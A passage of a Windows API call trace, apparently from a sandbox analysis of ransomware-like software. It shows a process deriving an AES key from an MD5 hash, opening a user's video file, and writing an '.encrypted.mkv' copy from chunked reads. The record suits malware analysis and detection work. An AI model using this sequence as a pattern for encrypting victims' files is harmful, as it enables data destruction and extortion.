lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0043.294] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.294] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0043.294] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.294] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.294] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.294] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.294] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.294] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.294] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0043.294] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0043.294] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.294] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.294] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0043.294] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.294] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.295] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0043.295] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.295] CryptDestroyHash (hHash=0x7c2240) returned 1 [0043.295] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\02dcezb-wigqkj.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.295] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.295] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0043.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0043.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0043.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0043.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.296] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0043.296] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0043.296] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0043.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0043.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0043.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0043.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0043.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0043.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0043.297] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw")) returned 0x10 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0043.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.298] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.encrypted.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\02dcezb-wigqkj.encrypted.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0043.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0043.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0043.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0043.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.298] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0043.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0043.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0043.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0043.298] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0043.298] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0043.299] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0043.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0043.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0043.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0043.299] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0043.299] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0043.302] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x667f, lpOverlapped=0x0) returned 1 [0043.303] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0043.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1667f) returned 0xac2018 [0043.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0043.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0043.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0043.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1667f) returned 0x935008 [0043.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.306] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1667f) returned 0xac2018 [0043.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0043.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.307] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0043.307] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.307] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0043.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0043.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1667f) returned 0xac2018 [0043.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0043.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0043.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0043.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0043.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0043.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0043.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889aa8 [0043.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0043.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0043.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0043.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1667f) returned 0x94b690 [0043.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0043.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0043.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0043.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0043.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0043.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0043.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0043.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0043.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0043.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.309] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0043.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0043.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0043.310] PeekMessageW (in: 